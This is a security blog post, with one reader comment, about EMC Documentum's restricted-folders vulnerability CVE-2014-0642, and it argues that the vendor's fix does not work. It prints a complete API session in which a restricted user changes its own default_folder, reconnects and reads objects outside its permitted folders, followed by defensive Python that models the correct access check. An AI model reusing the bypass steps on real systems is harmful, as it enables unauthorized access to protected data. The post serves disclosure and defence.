About restricted folders

On April 10, 2014, EMC announced CVE-2014-0642:

EMC Documentum Content Server may be vulnerable to an information disclosure vulnerability that may potentially be exploited by malicious users to gain unauthorized access to metadata. This is due to improper authorization checks being performed when trying to access metadata from folders outside of restricted folders configured for Content Server users. This vulnerability is only limited to reading the metadata as the malicious user is not able to gain read/write access to the content itself.

The vulnerability was found by Yuri Simione, who is even going to publish an “exploit” for it (it took me about ten minutes to work out how to exploit the vulnerability, but I am not going to publish anything related to that). Initially one thing confused me: Yuri writes that he discovered the vulnerability in January 2014, and EMC writes that it is fixed in CS 7.1 SP2 (released on March 1, 2014), so it took just one month to fix the vulnerability (note that using the restricted folders feature causes wrong results for some queries). EMC has been trying to fix multiple XSRFs for more than a year and still has no success, the privilege escalation vulnerabilities I discovered in November 2013 are still not fixed, but a low-impact vulnerability is worth fixing within a month. What a shame!

But today I realized that EMC actually didn’t fix anything. To demonstrate this I am not going to use any SQL injection or undocumented RPC commands, just the plain API and my knowledge of the security model. The session below is run as the restricted user itself (retrieve,c,dm_user where user_name=USER returns the current user’s own dm_user object):

API> retrieve,c,dm_user where user_name=USER
...
1102242880000143
API> get,c,l,user_name
...
dmc_wdk_presets_owner
API> ?,c,select count(*) from dm_sysobject where folder('/Temp',DESCEND)
[DM_QUERY_E_NOT_RESTRICTED_FOLDER_PATH]error:  
  "You have specified a folder path ( '/Temp' ) that is not a folder 
  (or subfolder of a folder) in the user's restricted_folder_ids."

API> get,c,l,default_folder
...
/Resources/Registry/Presets/Webtop
API> values,c,l,restricted_folder_ids
...
4
API> get,c,l,restricted_folder_ids[0]
...
0c02242880000130
API> get,c,l,restricted_folder_ids[1]
...
0c02242880000106
API> get,c,l,restricted_folder_ids[2]
...
0c02242880000130
API> get,c,l,restricted_folder_ids[3]
...
0c02242880000106
API> get,c,0c02242880000130,r_folder_path[0]
...
/Resources
API> get,c,0c02242880000106,r_folder_path[0]
...
/System
API> set,c,l,default_folder
SET> /Temp
...
OK
API> save,c,l
...
[DM_FOLDER_E_PATH_EXISTS]error:  "Cannot save (or link) 'Temp' 
  folder with path name '/Temp' because one already exists."
^^^
 we ignore this error (the save fails only because a folder named /Temp already exists) and simply reconnect as the same user:

API> connect,xcp21,dmc_wdk_presets_owner,webtop
...
s1
API> ?,c,select count(*) from dm_sysobject where folder('/Temp',DESCEND)
count(*)
----------------------
                   792
(1 row affected)

So what happened: before the change the user’s restricted_folder_ids contained only /Resources and /System (each listed twice), and the query over /Temp was correctly rejected with DM_QUERY_E_NOT_RESTRICTED_FOLDER_PATH. After the user sets its own default_folder to /Temp, a save that fails with DM_FOLDER_E_PATH_EXISTS, and reconnects, exactly the same query returns 792 objects from under /Temp, a folder the restriction was supposed to fence off. No superuser rights, no SQL and no undocumented RPC were needed, only the ability of a user to edit its own dm_user object.
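To make the rule behind DM_QUERY_E_NOT_RESTRICTED_FOLDER_PATH concrete, here is an added example (mine, not code from the post or from EMC) that models the check as the error message states it: a folder path used in a folder() predicate is acceptable only if it is one of the user’s restricted folders or a subfolder of one. It is not Content Server’s implementation and does not reproduce the bypass; it shows what a correct version of the check must do. The user record (dmc_wdk_presets_owner, default_folder /Resources/Registry/Presets/Webtop, the duplicated ids 0c02242880000130 and 0c02242880000106 resolving to /Resources and /System) is constructed from the session above; the function and class names (is_within, naive_is_within, RestrictedUser, folder_predicate_allowed, enforce_folder_predicate, default_folder_is_consistent) are my own, and the last one is an audit heuristic I am assuming, not a documented Documentum rule.

```python
from dataclasses import dataclass, field
from typing import List

# Constructed sample: folder ids -> r_folder_path[0], exactly as the API
# session printed them. In a real docbase this mapping comes from dm_folder.
FOLDER_PATHS = {
    "0c02242880000130": "/Resources",
    "0c02242880000106": "/System",
}


def _components(path: str) -> List[str]:
    """Split an absolute docbase folder path into its components."""
    if not path.startswith("/"):
        raise ValueError(f"not an absolute folder path: {path!r}")
    return [c for c in path.split("/") if c]


def is_within(path: str, ancestor: str) -> bool:
    """True if `path` is `ancestor` itself or a subfolder of it.

    Comparison is per path component, so '/Temporary' is NOT within '/Temp'.
    """
    p, a = _components(path), _components(ancestor)
    return p[: len(a)] == a


def naive_is_within(path: str, ancestor: str) -> bool:
    """The plain string-prefix shortcut; shown only to contrast with is_within."""
    return path.startswith(ancestor)


@dataclass
class RestrictedUser:
    """Subset of a dm_user object relevant to the restricted folders feature."""
    user_name: str
    default_folder: str
    restricted_folder_ids: List[str] = field(default_factory=list)

    def restricted_paths(self) -> List[str]:
        """Resolve ids to paths, dropping duplicates like those in the session."""
        seen, paths = set(), []
        for fid in self.restricted_folder_ids:
            if fid in seen:
                continue
            seen.add(fid)
            if fid not in FOLDER_PATHS:
                # Fail closed: an unresolvable id must not silently widen access.
                raise LookupError(f"restricted folder id {fid} does not resolve")
            paths.append(FOLDER_PATHS[fid])
        return paths


def folder_predicate_allowed(user: RestrictedUser, path: str) -> bool:
    """Model of the rule stated in the DM_QUERY_E_NOT_RESTRICTED_FOLDER_PATH text.

    A user with no restricted_folder_ids is unrestricted; otherwise the queried
    path must be a restricted folder or a subfolder of one.
    """
    allowed = user.restricted_paths()
    if not allowed:
        return True
    return any(is_within(path, a) for a in allowed)


def enforce_folder_predicate(user: RestrictedUser, path: str) -> None:
    """Raise with the server's wording when the predicate is not allowed."""
    if not folder_predicate_allowed(user, path):
        raise PermissionError(
            "[DM_QUERY_E_NOT_RESTRICTED_FOLDER_PATH] You have specified a folder "
            f"path ( '{path}' ) that is not a folder (or subfolder of a folder) "
            "in the user's restricted_folder_ids."
        )


def default_folder_is_consistent(user: RestrictedUser) -> bool:
    """Audit heuristic (my assumption, not a documented rule): a restricted
    user's default_folder should itself lie inside the restricted set. The
    session above ends with default_folder pointing outside it."""
    allowed = user.restricted_paths()
    return not allowed or any(is_within(user.default_folder, a) for a in allowed)


# Constructed from the API session: the user before the default_folder change.
PRESETS_OWNER = RestrictedUser(
    user_name="dmc_wdk_presets_owner",
    default_folder="/Resources/Registry/Presets/Webtop",
    restricted_folder_ids=[
        "0c02242880000130", "0c02242880000106",
        "0c02242880000130", "0c02242880000106",
    ],
)

# The same user after "set,c,l,default_folder" / "SET> /Temp".
PRESETS_OWNER_AFTER = RestrictedUser(
    user_name=PRESETS_OWNER.user_name,
    default_folder="/Temp",
    restricted_folder_ids=list(PRESETS_OWNER.restricted_folder_ids),
)

if __name__ == "__main__":
    for path in ("/Resources/Registry", "/System/Sysadmin", "/Temp"):
        try:
            enforce_folder_predicate(PRESETS_OWNER, path)
            print(f"{path}: allowed")
        except PermissionError as e:
            print(f"{path}: {e}")
    print("default_folder consistent before:", default_folder_is_consistent(PRESETS_OWNER))
    print("default_folder consistent after: ", default_folder_is_consistent(PRESETS_OWNER_AFTER))
```

The component-wise comparison is the part worth copying: a check that compares strings with startswith would let a user restricted to /Temp query /Temporary. The consistency audit is a cheap thing to run over dm_user after reading a post like this, since a restricted user whose default_folder points outside its restricted folders is at least misconfigured and worth a look.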

One thought on “About restricted folders”

  1. Actually EMC spent more than 2 months to solve this vulnerability that I disclosed on the 2nd of January. Regarding another vulnerability I discovered in July 2011, EMC published ESA-2012-009 six months later: too much, in my opinion. I think that two months to solve the ESA-2014-026 related issue aren’t too much, because the vulnerability impacted the Content Server engine: so four impacted versions (6.7 SP1, 6.7 SP2, 7.0 and 7.1), for all the supported combinations (o.s. / database). Thanks for sharing your knowledge, Andrey: I like your posts!
